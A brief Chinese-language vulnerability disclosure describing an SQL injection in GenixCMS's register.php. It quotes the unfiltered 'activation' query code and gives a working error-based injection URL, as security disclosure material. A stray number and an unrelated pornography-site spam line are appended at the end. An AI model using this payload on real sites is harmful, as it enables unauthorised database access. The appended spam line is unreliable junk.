GenixCMS某處SQL注入漏洞 2016-03-22

GenixCMS介紹

GenixCMS一款簡單和輕量級的移動商務內容管理系統,官網:http://genixcms.org/

漏洞原理

程序根目錄下的register.php中,第116行到118行:

if (isset($_GET['activation'])) {
    # code...
    $usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));

可以看到直接從網址獲取activation并且沒有經過任何過濾,直接帶入了sql語句查詢,故存在sql注入漏洞。

漏洞證明

注入payload如下:

http://genixcms.localhost/register.php?activation=1%27%20and%201=(updatexml(1,concat(0x23,(select%20user()),0x23),1))%23

465554565

TangScan插件

將在官方修復后發布。

一级A片不卡在线观看